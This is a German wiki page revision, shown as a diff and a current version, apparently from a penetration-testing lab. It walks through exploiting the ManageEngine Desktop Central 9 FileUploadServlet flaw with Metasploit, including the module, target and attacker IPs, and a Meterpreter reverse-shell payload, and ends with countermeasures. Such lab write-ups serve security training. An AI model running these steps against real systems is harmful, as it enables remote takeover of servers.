Manager Central Schwachstelle: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 1: | Zeile 1: | ||
| − | == Details zur Schwachstelle: ManageEngine Desktop Central | + | == Details zur Schwachstelle: ManageEngine Desktop Central - FileUploadServlet ConnectionId Exploit == |
| + | *Schwachstelle: Unsichere Datei-Upload-Funktion in ManageEngine Desktop Central ermöglicht einem Angreifer die Ausführung von Remote-Code (RCE). Diese *Schwachstelle erlaubt es, speziell gestaltete Dateien hochzuladen, die vom Server ausgeführt werden, was zur Kompromittierung des Systems führt. | ||
| − | + | *Angriffspunkt: Die Schwachstelle befindet sich im HTTP-Dienst von ManageEngine Desktop Central, der auf Port 8383 läuft. Ein Angreifer kann speziell gestaltete HTTP-Anfragen an den Server senden, um eine Datei hochzuladen und Code auszuführen. | |
| − | + | Ausnutzung: Ein Angreifer kann ein Exploit-Modul (z. B. Metasploit) verwenden, um diese Schwachstelle auszunutzen und eine Reverse-Shell zu erhalten. | |
| − | + | === Warum dieser Exploit? === | |
| + | |||
| + | Ein Nmap-Scan des Zielsystems (10.0.10.107) ergab, dass der Port 8383 für den Apache HTTP-Dienst geöffnet ist, der von ManageEngine Desktop Central verwendet wird. Wir haben die verfügbaren Exploits mit dem Befehl `searchsploit "ManageEngine Desktop Central 9"` durchsucht und festgestellt, dass der Exploit "ManageEngine Desktop Central 9 - FileUploadServlet ConnectionId (Metasploit)" (`jsp/remote/38982.rb`) speziell für die Version 9 von ManageEngine Desktop Central entwickelt wurde und bereits als Metasploit-Modul verfügbar ist. Dies machte es zu einer idealen Wahl für die Ausnutzung. | ||
=== Schritte zur Ausnutzung === | === Schritte zur Ausnutzung === | ||
| − | *Starte die Metasploit-Konsole: | + | * Starte die Metasploit-Konsole: |
msfconsole | msfconsole | ||
| − | *Wähle das Exploit-Modul für | + | * Wähle das Exploit-Modul für den FileUploadServlet ConnectionId Exploit: |
| − | use exploit/windows/http/ | + | use exploit/windows/http/manageengine_connectionid_write |
| − | *Setze die Optionen für das Zielsystem und die Payload: | + | * Setze die Optionen für das Zielsystem und die Payload: |
| − | set | + | set RHOST 10.0.10.107 # Ziel-IP-Adresse |
| − | set RPORT | + | set RPORT 8383 # Ziel-Port |
| − | set LHOST 10.0.10.101 | + | set LHOST 10.0.10.101 # Angreifer-IP-Adresse für die Reverse-Shell |
| − | set LPORT 4444 | + | set LPORT 4444 # Lokaler Port für die Verbindung |
| − | set PAYLOAD windows/meterpreter/reverse_tcp # Payload-Typ | + | set PAYLOAD windows/meterpreter/reverse_tcp # Payload-Typ |
| − | *Überprüfe die Optionen, um sicherzustellen, dass sie korrekt gesetzt sind: | + | * Überprüfe die Optionen, um sicherzustellen, dass sie korrekt gesetzt sind: |
show options | show options | ||
| − | *Führe den Exploit aus: | + | * Führe den Exploit aus: |
exploit | exploit | ||
| − | *Überprüfe die Verbindung: | + | * Überprüfe die Verbindung: |
Wenn der Exploit erfolgreich ist, erhältst du eine Meterpreter-Sitzung. Von hier aus kannst du weitere Post-Exploitation-Schritte ausführen, wie z.B. Privilegien-Eskalation, Dateisystem durchsuchen, usw. | Wenn der Exploit erfolgreich ist, erhältst du eine Meterpreter-Sitzung. Von hier aus kannst du weitere Post-Exploitation-Schritte ausführen, wie z.B. Privilegien-Eskalation, Dateisystem durchsuchen, usw. | ||
=== Warum ist diese Schwachstelle gefährlich? === | === Warum ist diese Schwachstelle gefährlich? === | ||
| − | * | + | * Remote Code Execution (RCE): Ermöglicht es einem Angreifer, beliebige Befehle auf dem Zielsystem auszuführen. |
| − | * | + | * Volle Kompromittierung: Ein erfolgreicher Angriff führt zur vollständigen Kontrolle des betroffenen Servers. |
| − | * | + | * Einfacher Angriff auf ungeschützte Systeme: Ungepatchte Versionen von ManageEngine Desktop Central sind besonders gefährdet. |
=== Gegenmaßnahmen === | === Gegenmaßnahmen === | ||
* Aktualisiere ManageEngine Desktop Central auf die neueste Version, die diese Schwachstelle behebt. | * Aktualisiere ManageEngine Desktop Central auf die neueste Version, die diese Schwachstelle behebt. | ||
| − | * | + | * Setze Web Application Firewalls (WAFs) und Intrusion Detection/Prevention Systems (IDS/IPS) ein, um bösartige Anfragen zu blockieren. |
* Deaktiviere unnötige Dienste und überprüfe die Konfigurationseinstellungen regelmäßig. | * Deaktiviere unnötige Dienste und überprüfe die Konfigurationseinstellungen regelmäßig. | ||
Version vom 29. August 2024, 07:58 Uhr
Details zur Schwachstelle: ManageEngine Desktop Central - FileUploadServlet ConnectionId Exploit
- Schwachstelle: Unsichere Datei-Upload-Funktion in ManageEngine Desktop Central ermöglicht einem Angreifer die Ausführung von Remote-Code (RCE). Diese *Schwachstelle erlaubt es, speziell gestaltete Dateien hochzuladen, die vom Server ausgeführt werden, was zur Kompromittierung des Systems führt.
- Angriffspunkt: Die Schwachstelle befindet sich im HTTP-Dienst von ManageEngine Desktop Central, der auf Port 8383 läuft. Ein Angreifer kann speziell gestaltete HTTP-Anfragen an den Server senden, um eine Datei hochzuladen und Code auszuführen.
Ausnutzung: Ein Angreifer kann ein Exploit-Modul (z. B. Metasploit) verwenden, um diese Schwachstelle auszunutzen und eine Reverse-Shell zu erhalten.
Warum dieser Exploit?
Ein Nmap-Scan des Zielsystems (10.0.10.107) ergab, dass der Port 8383 für den Apache HTTP-Dienst geöffnet ist, der von ManageEngine Desktop Central verwendet wird. Wir haben die verfügbaren Exploits mit dem Befehl `searchsploit "ManageEngine Desktop Central 9"` durchsucht und festgestellt, dass der Exploit "ManageEngine Desktop Central 9 - FileUploadServlet ConnectionId (Metasploit)" (`jsp/remote/38982.rb`) speziell für die Version 9 von ManageEngine Desktop Central entwickelt wurde und bereits als Metasploit-Modul verfügbar ist. Dies machte es zu einer idealen Wahl für die Ausnutzung.
Schritte zur Ausnutzung
- Starte die Metasploit-Konsole:
msfconsole
- Wähle das Exploit-Modul für den FileUploadServlet ConnectionId Exploit:
use exploit/windows/http/manageengine_connectionid_write
- Setze die Optionen für das Zielsystem und die Payload:
set RHOST 10.0.10.107 # Ziel-IP-Adresse set RPORT 8383 # Ziel-Port set LHOST 10.0.10.101 # Angreifer-IP-Adresse für die Reverse-Shell set LPORT 4444 # Lokaler Port für die Verbindung set PAYLOAD windows/meterpreter/reverse_tcp # Payload-Typ
- Überprüfe die Optionen, um sicherzustellen, dass sie korrekt gesetzt sind:
show options
- Führe den Exploit aus:
exploit
- Überprüfe die Verbindung:
Wenn der Exploit erfolgreich ist, erhältst du eine Meterpreter-Sitzung. Von hier aus kannst du weitere Post-Exploitation-Schritte ausführen, wie z.B. Privilegien-Eskalation, Dateisystem durchsuchen, usw.
Warum ist diese Schwachstelle gefährlich?
- Remote Code Execution (RCE): Ermöglicht es einem Angreifer, beliebige Befehle auf dem Zielsystem auszuführen.
- Volle Kompromittierung: Ein erfolgreicher Angriff führt zur vollständigen Kontrolle des betroffenen Servers.
- Einfacher Angriff auf ungeschützte Systeme: Ungepatchte Versionen von ManageEngine Desktop Central sind besonders gefährdet.
Gegenmaßnahmen
- Aktualisiere ManageEngine Desktop Central auf die neueste Version, die diese Schwachstelle behebt.
- Setze Web Application Firewalls (WAFs) und Intrusion Detection/Prevention Systems (IDS/IPS) ein, um bösartige Anfragen zu blockieren.
- Deaktiviere unnötige Dienste und überprüfe die Konfigurationseinstellungen regelmäßig.